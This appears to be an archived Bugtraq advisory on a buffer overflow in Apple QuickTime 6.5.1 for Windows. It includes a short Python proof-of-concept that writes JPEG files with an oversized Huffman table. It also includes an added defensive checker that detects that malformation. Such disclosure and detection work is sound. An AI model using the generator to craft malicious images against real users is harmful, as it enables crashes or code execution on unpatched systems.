Apple QuickTime PictureViewer Buffer Overflow Vulnerability
BID:12905
Info
| Bugtraq ID: | 12905 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 26 2005 12:00AM |
| Updated: | Mar 26 2005 12:00AM |
| Credit: | Credited to <[email protected]>. |
| Vulnerable: | Apple QuickTime Player 6.5.1 |
| Not Vulnerable: | |
Discussion
Apple QuickTime is reportedly prone to a buffer overflow when viewing malformed image files.
This issue was reported to exist in QuickTime 6.5.1 for Windows. Other versions may also be affected.
This issue may be related to BID 11553.
Exploit / POC
The following Python script was provided to generate malformed JPEG files intended to exploit this issue:
import struct
f=open(raw_input("enter the path to the input file:\n"),"rb")
a=f.read()
f.close()
n=a.index("\xff\xc4")
b=a[:n]+"\xff\xc4\x02\x11\x00\xff\xff"+"\x00"*14+"\x01"*510+a[n+2+struct.unpack("!H",a[n+2:n+4])[0]:]
f=open(raw_input("enter the path to the output file:\n"),"wb")
f.write(b)
f.close()
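A defensive check for the malformation this script produces, added here as an example and not part of the original advisory: the replacement DHT (0xFFC4) segment declares 255 + 255 = 510 Huffman symbols, more than the 256 byte values a single table can hold. The function names and sample byte strings are constructed for illustration, and that this count is what triggers the overflow in QuickTime is an assumption the advisory does not confirm.

```python
import struct
MAX_SYMBOLS = 256  # one Huffman table can assign codes to at most 256 byte values

def check_tables(body, seg_off):
    """Validate every Huffman table packed into one DHT segment body."""
    problems, i = [], 0
    while i < len(body):
        if len(body) - i < 17:  # 1 class/id byte + 16 per-length counts
            problems.append(f"DHT@{seg_off}: truncated table header")
            break
        tc, th = body[i] >> 4, body[i] & 0x0F
        total = sum(body[i + 1:i + 17])  # symbols the table claims to carry
        if tc > 1 or th > 3:
            problems.append(f"DHT@{seg_off}: bad table class/id {tc}/{th}")
        if total > MAX_SYMBOLS:
            problems.append(f"DHT@{seg_off}: {total} symbols declared, max {MAX_SYMBOLS}")
            break
        if total > len(body) - i - 17:
            problems.append(f"DHT@{seg_off}: symbol list overruns segment")
            break
        i += 17 + total
    return problems

def check_dht(data):
    """Report malformed DHT segments (assumed, not confirmed by the advisory, to be the trigger)."""
    if data[:2] != b"\xff\xd8":
        return ["missing SOI marker"]
    problems, pos = [], 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            problems.append(f"offset {pos}: expected a marker")
            break
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI or SOS: no more header tables
            break
        (seg_len,) = struct.unpack("!H", data[pos + 2:pos + 4])
        body = data[pos + 4:pos + 2 + seg_len]
        if len(body) != seg_len - 2:  # also catches declared lengths below 2
            problems.append(f"offset {pos}: bad segment length {seg_len}")
            break
        if marker == 0xC4:
            problems += check_tables(body, pos)
        pos += 2 + seg_len
    return problems

# Constructed samples (SOI + one DHT + EOI); BAD_JPEG reuses the DHT bytes from the script above.
GOOD_JPEG = b"\xff\xd8\xff\xc4" + struct.pack("!H", 21) + bytes([0, 0, 2] + [0] * 14) + b"\x00\x01\xff\xd9"
BAD_JPEG = b"\xff\xd8\xff\xc4\x02\x11\x00\xff\xff" + b"\x00" * 14 + b"\x01" * 510 + b"\xff\xd9"
print(check_dht(GOOD_JPEG), check_dht(BAD_JPEG))
```

The walker stops at the first SOS or EOI marker and does not handle 0xFF fill bytes between segments, so it suits header triage rather than full JPEG validation.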
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].